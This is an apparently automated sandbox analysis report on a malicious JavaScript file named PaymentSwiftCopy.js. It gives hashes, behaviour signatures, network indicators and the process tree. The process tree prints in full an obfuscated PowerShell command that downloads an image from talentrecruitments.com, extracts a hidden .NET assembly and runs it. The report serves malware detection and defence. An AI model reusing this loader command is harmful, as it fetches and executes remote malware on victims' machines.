Analysis
-
max time kernel
120s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
25/03/2025, 13:25 UTC
General
-
Target
PaymentSwiftCopy.js
-
Size
1.3MB
-
MD5
410a3c00c23b4af500311ae954d7fae5
-
SHA1
44b996b2040ddc20f1cf07c7e070514f856b02c9
-
SHA256
c3aa4900a10fcf72db0cce3754e4cb44617229442f01ed0caf18c159ceea7e57
-
SHA512
589b6805ca596f85c3cf5ef2365996ae9102ad8460cfd9fc6068df8284e1044002cbf8aa27e327d850f33472f951089d4e8ce43bd5acb0c3a6ff6f31ad9341ce
-
SSDEEP
192:To1o1o1o1o1o1o1o1o1o1go1o1o1o1o1o1o1o1o1o1go1o1o1o1o1o1o1o1o1o1L:VplQBOr
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\PaymentSwiftCopy.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JhypoariaBvhypoariaGIhypoariabwBlhypoariaGwhypoariaaQBrhypoariaGUhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJwhypoariajhypoariaHghypoariaIwhypoariauhypoariaGUhypoariabhypoariaBphypoariaEYhypoariaZhypoariaBlhypoariaCMhypoariacgBlhypoariaHYhypoariabgBvhypoariaEMhypoariaLwBthypoariaG8hypoariaYwhypoariauhypoariaHMhypoariaIwBuhypoariaGUhypoariabQhypoariajhypoariaGkhypoariadQByhypoariaGMhypoariaZQByhypoariaCMhypoariabgBlhypoariaGwhypoariaYQhypoariajhypoariaC8hypoariaLwhypoaria6hypoariaHMhypoariachypoariahypoariajhypoariaCMhypoariaahypoariahypoarianhypoariaDshypoariaJhypoariaBihypoariaGUhypoariabgBkhypoariaHMhypoariabwBthypoariaGUhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJhypoariaBvhypoariaGIhypoariabwBlhypoariaGwhypoariaaQBrhypoariaGUhypoariaIhypoariahypoariathypoariaHIhypoariaZQBwhypoariaGwhypoariaYQBjhypoariaGUhypoariaIhypoariahypoarianhypoariaCMhypoariaJwhypoariashypoariaChypoariahypoariaJwB0hypoariaCchypoariaOwhypoariakhypoariaG0hypoariaYQBshypoariaGwhypoariabwBwhypoariaGwhypoariaYQBjhypoariaGUhypoariabgB0hypoariaGEhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJwBohypoariaHQhypoariadhypoariaBwhypoariaHMhypoariaOghypoariavhypoariaC8hypoariadhypoariaBhhypoariaGwhypoariaZQBuhypoariaHQhypoariacgBlhypoariaGMhypoariacgB1hypoariaGkhypoariadhypoariaBthypoariaGUhypoariabgB0hypoariaHMhypoariaLgBjhypoariaG8hypoariabQhypoariavhypoariaG4hypoariaZQB3hypoariaF8hypoariaaQBthypoariaGEhypoariaZwBlhypoariaC4hypoariaagBwhypoariaGchypoariaJwhypoaria7hypoariaCQhypoariadhypoariaB1hypoariaGchypoariadhypoariaB1hypoariaHhypoariahypoariaaQB0hypoariaGUhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaTgBlhypoariaHchypoariaLQBPhypoariaGIhypoariaagBlhypoariaGMhypoariadhypoariahypoariaghypoariaFMhypoariaeQBzhypoariaHQhypoariaZQBthypoariaC4hypoariaTgBlhypoariaHQhypoariaLgBXhypoariaGUhypoariaYgBDhypoariaGwhypoariaaQBlhypoariaG4hypoariadhypoariahypoaria7hypoariaCQhypoariadwBphypoariaG4hypoariaZhypoariaBthypoariaGkhypoariabhypoariaBshypoariaGUhypoariaZhypoariahypoariaghypoariaD0hypoariaIhypoariahypoariakhypoariaHQhypoariadQBnhypoariaHQhypoariadQBwhypoariaGkhypoariadhypoariaBlhypoariaC4hypoariaRhypoariaBvhypoariaHchypoariabgBshypoariaG8hypoariaYQBkhypoariaEQhypoariaYQB0hypoariaGEhypoariaKhypoariahypoariakhypoariaG0hypoariaYQBshypoariaGwhypoariabwBwhypoariaGwhypoariaYQBjhypoariaGUhypoariabgB0hypoariaGEhypoariaKQhypoaria7hypoariaCQhypoariaZhypoariaB1hypoariaGMhypoariaawBphypoariaG4hypoariaZwhypoariaghypoariaD0hypoariaIhypoariaBbhypoariaFMhypoariaeQBzhypoariaHQhypoariaZQBthypoariaC4hypoariaVhypoariaBlhypoariaHghypoariadhypoariahypoariauhypoariaEUhypoariabgBjhypoariaG8hypoariaZhypoariaBphypoariaG4hypoariaZwBdhypoariaDohypoariaOgBVhypoariaFQhypoariaRghypoaria4hypoariaC4hypoariaRwBlhypoariaHQhypoariaUwB0hypoariaHIhypoariaaQBuhypoariaGchypoariaKhypoariahypoariakhypoariaHchypoariaaQBuhypoariaGQhypoariabQBphypoariaGwhypoariabhypoariaBlhypoariaGQhypoariaKQhypoaria7hypoariaCQhypoariaYwBvhypoariaG8hypoariabhypoariaBphypoariaG0hypoariaYQBuhypoariaChypoariahypoariaPQhypoariaghypoariaCchypoariaPhypoariahypoaria8hypoariaEIhypoariaQQBThypoariaEUhypoariaNghypoaria0hypoariaF8hypoariaUwBUhypoariaEEhypoariaUgBUhypoariaD4hypoariaPghypoarianhypoariaDshypoariaJhypoariaBhhypoariaHYhypoariaYQB1hypoariaG4hypoariadhypoariaBvhypoariaHUhypoariacghypoariaghypoariaD0hypoariaIhypoariahypoarianhypoariaDwhypoariaPhypoariaBChypoariaEEhypoariaUwBFhypoariaDYhypoariaNhypoariaBfhypoariaEUhypoariaTgBEhypoariaD4hypoariaPghypoarianhypoariaDshypoariaJhypoariaBnhypoariaGUhypoariabgB0hypoariaHMhypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJhypoariaBkhypoariaHUhypoariaYwBrhypoariaGkhypoariabgBnhypoariaC4hypoariaSQBuhypoariaGQhypoariaZQB4hypoariaE8hypoariaZghypoariaohypoariaCQhypoariaYwBvhypoariaG8hypoariabhypoariaBphypoariaG0hypoariaYQBuhypoariaCkhypoariaOwhypoariakhypoariaGQhypoariaYQBzhypoariaGUhypoariadwBlhypoariaChypoariahypoariaPQhypoariaghypoariaCQhypoariaZhypoariaB1hypoariaGMhypoariaawBphypoariaG4hypoariaZwhypoariauhypoariaEkhypoariabgBkhypoariaGUhypoariaehypoariaBPhypoariaGYhypoariaKhypoariahypoariakhypoariaGEhypoariadgBhhypoariaHUhypoariabgB0hypoariaG8hypoariadQByhypoariaCkhypoariaOwhypoariakhypoariaGchypoariaZQBuhypoariaHQhypoariacwhypoariaghypoariaC0hypoariaZwBlhypoariaChypoariahypoariaMhypoariahypoariaghypoariaC0hypoariaYQBuhypoariaGQhypoariaIhypoariahypoariakhypoariaGQhypoariaYQBzhypoariaGUhypoariadwBlhypoariaChypoariahypoariaLQBnhypoariaHQhypoariaIhypoariahypoariakhypoariaGchypoariaZQBuhypoariaHQhypoariacwhypoaria7hypoariaCQhypoariaZwBlhypoariaG4hypoariadhypoariaBzhypoariaChypoariahypoariaKwhypoaria9hypoariaChypoariahypoariaJhypoariaBjhypoariaG8hypoariabwBshypoariaGkhypoariabQBhhypoariaG4hypoariaLgBMhypoariaGUhypoariabgBnhypoariaHQhypoariaahypoariahypoaria7hypoariaCQhypoariaQQBthypoariaGIhypoariaaQBlhypoariaG4hypoariaIhypoariahypoaria9hypoariaChypoariahypoariaJhypoariaBkhypoariaGEhypoariacwBlhypoariaHchypoariaZQhypoariaghypoariaC0hypoariaIhypoariahypoariakhypoariaGchypoariaZQBuhypoariaHQhypoariacwhypoaria7hypoariaCQhypoariabwBwhypoariaG8hypoariadhypoariaBohypoariaGUhypoariacgBhhypoariaHhypoariahypoariaeQhypoariaghypoariaD0hypoariaIhypoariahypoariakhypoariaGQhypoariadQBjhypoariaGshypoariaaQBuhypoariaGchypoariaLgBThypoariaHUhypoariaYgBzhypoariaHQhypoariacgBphypoariaG4hypoariaZwhypoariaohypoariaCQhypoariaZwBlhypoariaG4hypoariadhypoariaBzhypoariaCwhypoariaIhypoariahypoariakhypoariaEEhypoariabQBihypoariaGkhypoariaZQBuhypoariaCkhypoariaOwhypoariakhypoariaHhypoariahypoariaZQB0hypoariaHIhypoariabwBshypoariaGkhypoariaYwhypoariaghypoariaD0hypoariaIhypoariaBbhypoariaFMhypoariaeQBzhypoariaHQhypoariaZQBthypoariaC4hypoariaQwBvhypoariaG4hypoariadgBlhypoariaHIhypoariadhypoariaBdhypoariaDohypoariaOgBGhypoariaHIhypoariabwBthypoariaEIhypoariaYQBzhypoariaGUhypoariaNghypoaria0hypoariaFMhypoariadhypoariaByhypoariaGkhypoariabgBnhypoariaCghypoariaJhypoariaBvhypoariaHhypoariahypoariabwB0hypoariaGghypoariaZQByhypoariaGEhypoariachypoariaB5hypoariaCkhypoariaOwhypoariakhypoariaGYhypoariaZQByhypoariaHIhypoariabwBhhypoariaG4hypoariaIhypoariahypoaria9hypoariaChypoariahypoariaWwBThypoariaHkhypoariacwB0hypoariaGUhypoariabQhypoariauhypoariaFIhypoariaZQBmhypoariaGwhypoariaZQBjhypoariaHQhypoariaaQBvhypoariaG4hypoariaLgBBhypoariaHMhypoariacwBlhypoariaG0hypoariaYgBshypoariaHkhypoariaXQhypoaria6hypoariaDohypoariaThypoariaBvhypoariaGEhypoariaZhypoariahypoariaohypoariaCQhypoariachypoariaBlhypoariaHQhypoariacgBvhypoariaGwhypoariaaQBjhypoariaCkhypoariaOwhypoariakhypoariaHUhypoariabgBlhypoariaG4hypoariadgBphypoariaGUhypoariaZhypoariahypoariaghypoariaD0hypoariaIhypoariaBbhypoariaGQhypoariabgBshypoariaGkhypoariaYghypoariauhypoariaEkhypoariaTwhypoariauhypoariaEghypoariabwBthypoariaGUhypoariaXQhypoariauhypoariaEchypoariaZQB0hypoariaE0hypoariaZQB0hypoariaGghypoariabwBkhypoariaCghypoariaJwBWhypoariaEEhypoariaSQhypoarianhypoariaCkhypoariaLgBJhypoariaG4hypoariadgBvhypoariaGshypoariaZQhypoariaohypoariaCQhypoariabgB1hypoariaGwhypoariabhypoariahypoariashypoariaChypoariahypoariaWwBvhypoariaGIhypoariaagBlhypoariaGMhypoariadhypoariaBbhypoariaF0hypoariaXQhypoariaghypoariaEhypoariahypoariaKhypoariahypoariakhypoariaGIhypoariaZQBuhypoariaGQhypoariacwBvhypoariaG0hypoariaZQhypoariashypoariaCchypoariaJwhypoariashypoariaCchypoariaJwhypoariashypoariaCchypoariaJwhypoariashypoariaCchypoariaTQBThypoariaEIhypoariadQBphypoariaGwhypoariaZhypoariahypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoarianhypoariaCwhypoariaJwhypoariayhypoariaCchypoariaKQhypoariaphypoariahypoaria=='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('hypoaria','A'))); Invoke-Expression $OWjuxd""2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
-
DNStalentrecruitments.comRemote address:8.8.8.8:53Requesttalentrecruitments.comIN AResponsetalentrecruitments.comIN A67.23.254.14 -
DNStalentrecruitments.comRemote address:8.8.8.8:53Requesttalentrecruitments.comIN A
-
DNStalentrecruitments.comRemote address:8.8.8.8:53Requesttalentrecruitments.comIN A
-
DNStalentrecruitments.comRemote address:8.8.8.8:53Requesttalentrecruitments.comIN A
-
67.23.254.14:443talentrecruitments.comtls
-
67.23.254.14:443talentrecruitments.comtls
-
8.8.8.8:53talentrecruitments.comdns
DNS Request
talentrecruitments.com
DNS Request
talentrecruitments.com
DNS Request
talentrecruitments.com
DNS Request
talentrecruitments.com
DNS Response
67.23.254.14
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
4KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB